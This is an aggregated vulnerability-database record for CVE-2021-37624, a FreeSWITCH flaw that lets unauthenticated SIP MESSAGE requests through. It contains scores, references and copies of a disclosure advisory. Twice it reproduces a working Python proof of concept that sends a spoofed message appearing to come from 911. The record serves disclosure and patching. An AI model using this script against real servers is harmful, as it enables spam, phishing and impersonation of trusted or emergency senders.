FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.
{"id": "CVE-2021-37624", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-37624", "description": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.", "published": "2021-10-25T16:15:00", "modified": "2021-11-02T19:14:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-37624", "reporter": "security-advisories@github.com", "references": ["https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3", "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7", "http://www.openwall.com/lists/oss-security/2021/10/25/6", "http://seclists.org/fulldisclosure/2021/Oct/44", "http://packetstormsecurity.com/files/164628/FreeSWITCH-1.10.6-Missing-SIP-MESSAGE-Authentication.html"], "cvelist": ["CVE-2021-37624"], "immutableFields": [], "lastseen": "2022-03-23T18:56:21", "viewCount": 29, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-37624"]}, {"type": "githubexploit", "idList": ["0BF72729-44F7-545C-8475-3FBEB99370C9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164628"]}, {"type": "zdt", "idList": ["1337DAY-ID-36956"]}], "rev": 4}, "score": {"value": 2.1, "vector": "NONE"}, "twitter": {"counter": 7, "tweets": [{"link": "https://twitter.com/0xInfection/status/1467549209037393920", "text": "Published a blog around the finding and analysis of 2 /freeswitch vulns (CVE-2021-37624 and CVE-2021-41157) that were patched and disclosed a month ago.\nhttps://t.co/pjr4BYrwFp\n\nAlso releasing a scanning and exploitation tool for the vulnerabilities! :)\nhttps://t.co/AeulPBLSAJ"}, {"link": "https://twitter.com/0xInfection/status/1467549209037393920", "text": "Published a blog around the finding and analysis of 2 /freeswitch vulns (CVE-2021-37624 and CVE-2021-41157) that were patched and disclosed a month ago.\nhttps://t.co/pjr4BYrwFp\n\nAlso releasing a scanning and exploitation tool for the vulnerabilities! :)\nhttps://t.co/AeulPBLSAJ"}, {"link": "https://twitter.com/ipssignatures/status/1467615773405421568", "text": "The vuln CVE-2021-37624 has a tweet created 0 days ago and retweeted 8 times.\n/0xInfection/status/1467549209037393920\n/hashtag/Sncanfrcs3ghcu?src=hashtag_click"}, {"link": "https://twitter.com/ksg93rd/status/1467714288617992193", "text": "/hashtag/Offensive_security?src=hashtag_click\n1. A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 / CVE-2021-41157\nhttps://t.co/DpYaXIua10\n2. Novel RTF Template Inject Technique Poised for Widespread Adoption\u202fBeyond APT Actors\nhttps://t.co/bb7E3BRgyh"}, {"link": "https://twitter.com/hack_git/status/1467737501557219338", "text": "A /hashtag/FreeSWITCH?src=hashtag_click specific /hashtag/scanning?src=hashtag_click and exploitation toolkit for CVE-2021-37624 / /hashtag/CVE?src=hashtag_click-2021-41157\nhttps://t.co/ozAl8iqkSD\n\nNovel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors\nhttps://t.co/JtudMUIcJO https://t.co/fR6qDIqhnK"}, {"link": "https://twitter.com/Securityblog/status/1467775224884117508", "text": "GitHub - 0xInfection/PewSWITCH: A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157."}, {"link": "https://twitter.com/akaclandestine/status/1468170828634284037", "text": "GitHub - 0xInfection/PewSWITCH: A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157."}], "modified": "2021-11-26T16:57:13"}, "backreferences": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-37624"]}, {"type": "githubexploit", "idList": ["0BF72729-44F7-545C-8475-3FBEB99370C9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164628"]}, {"type": "zdt", "idList": ["1337DAY-ID-36956"]}]}, "exploitation": null, "vulnersScore": 2.1}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "GitHub, Inc.", "cvss": {"3": {"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "score": 7.5}}}, "cpe": [], "cpe23": [], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "freeswitch:freeswitch", "version": "1.10.7", "operator": "lt", "name": "freeswitch"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:1.10.7:*:*:*:*:*:*:*", "versionEndExcluding": "1.10.7", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3", "name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3", "refsource": "CONFIRM", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7", "name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2021/10/25/6", "name": "[oss-security] 20211025 [ES2021-07] FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing", "refsource": "MLIST", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2021/Oct/44", "name": "20211026 [ES2021-07] FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing", "refsource": "FULLDISC", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164628/FreeSWITCH-1.10.6-Missing-SIP-MESSAGE-Authentication.html", "name": "http://packetstormsecurity.com/files/164628/FreeSWITCH-1.10.6-Missing-SIP-MESSAGE-Authentication.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"zdt": [{"lastseen": "2021-12-03T01:50:26", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-26T00:00:00", "type": "zdt", "title": "FreeSWITCH 1.10.6 Missing SIP MESSAGE Authentication Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37624"], "modified": "2021-10-26T00:00:00", "id": "1337DAY-ID-36956", "href": "https://0day.today/exploit/description/36956", "sourceData": "# FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing\n\n- Fixed versions: v1.10.7\n- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-07-freeswitch-SIP-MESSAGE-without-auth\n- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3\n- Other references: CVE-2021-37624\n- Tested vulnerable versions: <= v1.10.6\n- Timeline:\n - Report date: 2021-06-07\n - Fix provided for testing: 2021-07-27\n - Vendor release with fix: 2021-10-24\n - Enable Security advisory: 2021-10-25\n\n## Description\n\nBy default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting.\n\n## Impact\n\nAbuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks.\n\nWe are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests.\n\n## How to reproduce the issue\n\n1. Install FreeSWITCH v1.10.6 or lower\n2. Run FreeSWITCH using the default configuration\n3. Register as a legitimate SIP user with the FreeSWITCH server (e.g. `sip:[email\u00a0protected]` where `192.168.1.100` is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper)\n4. Save the below Python script to `anon-message.py`\n5. Run the Python script `python anon-message.py <freeswitch_ip> <target_extension>`\n6. Observe the SIP message appear on your softphone, pretending to be from 911\n\n\n```python\nimport sys, socket, random, string\n\nUDP_IP = sys.argv[1]\nUDP_PORT = 5060\next = sys.argv[2]\nrand = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\nmsg=\"MESSAGE sip:%[email\u00a0protected]%s SIP/2.0\\r\\n\" % (ext, UDP_IP)\nmsg+=\"Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\\r\\n\" % rand\nmsg+=\"Max-Forwards: 70\\r\\n\"\nmsg+=\"From: 911 <sip:[email\u00a0protected]%s>;tag=%s\\r\\n\" %(UDP_IP, rand)\nmsg+=\"To: <sip:%[email\u00a0protected]%s>\\r\\n\" %(ext, UDP_IP)\nmsg+=\"Call-ID: %s\\r\\n\" % rand\nmsg+=\"CSeq: 1 MESSAGE\\r\\n\"\nmsg+=\"Contact: <sip:[email\u00a0protected]:48760;transport=udp>\\r\\n\"\nmsg+=\"Content-Type: text/plain\\r\\n\"\nmsg+=\"Content-Length: 5\\r\\n\\r\\n\"\nmsg+=\"hello\"\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(msg.encode(), (UDP_IP, UDP_PORT))\n```\n\n## Solution and recommendations\n\nUpgrade to a version of FreeSWITCH that fixes this issue.\n\nOur suggestion to the FreeSWITCH developers was the following:\n\n> Our recommendation is that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.\n", "sourceHref": "https://0day.today/exploit/36956", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "veracode": [{"lastseen": "2022-05-12T00:31:21", "description": "freeswitch is vulnerable to Authentication Bypass. The vulnerability exists because the SIP MESSAGE requests are not properly authenticated which allows an attacker to to send SIP MESSAGE messages to any SIP user agent that is registered with the server.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-05T11:38:07", "type": "veracode", "title": "Authentication Bypass", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37624"], "modified": "2021-11-29T01:20:09", "id": "VERACODE:32828", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32828/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "alpinelinux": [{"lastseen": "2022-06-22T18:32:51", "description": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-25T16:15:00", "type": "alpinelinux", "title": "CVE-2021-37624", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37624"], "modified": "2021-11-02T19:14:00", "id": "ALPINE:CVE-2021-37624", "href": "https://security.alpinelinux.org/vuln/CVE-2021-37624", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-10-25T17:33:42", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "FreeSWITCH 1.10.6 Missing SIP MESSAGE Authentication", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-37624"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164628", "href": "https://packetstormsecurity.com/files/164628/FreeSWITCH-1.10.6-Missing-SIP-MESSAGE-Authentication.html", "sourceData": "`# FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing \n \n- Fixed versions: v1.10.7 \n- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-07-freeswitch-SIP-MESSAGE-without-auth \n- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3 \n- Other references: CVE-2021-37624 \n- Tested vulnerable versions: <= v1.10.6 \n- Timeline: \n- Report date: 2021-06-07 \n- Fix provided for testing: 2021-07-27 \n- Vendor release with fix: 2021-10-24 \n- Enable Security advisory: 2021-10-25 \n \n## Description \n \nBy default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. \n \n## Impact \n \nAbuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. \n \nWe are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests. \n \n## How to reproduce the issue \n \n1. Install FreeSWITCH v1.10.6 or lower \n2. Run FreeSWITCH using the default configuration \n3. Register as a legitimate SIP user with the FreeSWITCH server (e.g. `sip:1000@192.168.1.100` where `192.168.1.100` is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper) \n4. Save the below Python script to `anon-message.py` \n5. Run the Python script `python anon-message.py <freeswitch_ip> <target_extension>` \n6. Observe the SIP message appear on your softphone, pretending to be from 911 \n \n \n```python \nimport sys, socket, random, string \n \nUDP_IP = sys.argv[1] \nUDP_PORT = 5060 \next = sys.argv[2] \nrand = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) \nmsg=\"MESSAGE sip:%s@%s SIP/2.0\\r\\n\" % (ext, UDP_IP) \nmsg+=\"Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\\r\\n\" % rand \nmsg+=\"Max-Forwards: 70\\r\\n\" \nmsg+=\"From: 911 <sip:911@%s>;tag=%s\\r\\n\" %(UDP_IP, rand) \nmsg+=\"To: <sip:%s@%s>\\r\\n\" %(ext, UDP_IP) \nmsg+=\"Call-ID: %s\\r\\n\" % rand \nmsg+=\"CSeq: 1 MESSAGE\\r\\n\" \nmsg+=\"Contact: <sip:911@192.168.1.159:48760;transport=udp>\\r\\n\" \nmsg+=\"Content-Type: text/plain\\r\\n\" \nmsg+=\"Content-Length: 5\\r\\n\\r\\n\" \nmsg+=\"hello\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock.sendto(msg.encode(), (UDP_IP, UDP_PORT)) \n``` \n \n## Solution and recommendations \n \nUpgrade to a version of FreeSWITCH that fixes this issue. \n \nOur suggestion to the FreeSWITCH developers was the following: \n \n> Our recommendation is that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. \n \n## About Enable Security \n \n[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack. \n \n## Disclaimer \n \nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. \n \n## Disclosure policy \n \nThis report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164628/ES2021-07.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-02-23T18:02:37", "description": "# PewSWITCH\nA FreeSWITCH specific scanning and exploitation tool...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-28T13:12:38", "type": "githubexploit", "title": "Exploit for Improper Authentication in Freeswitch", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27624", "CVE-2021-41157", "CVE-2021-37624"], "modified": "2022-02-23T15:31:41", "id": "0BF72729-44F7-545C-8475-3FBEB99370C9", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}]}
CVE-2021-37624
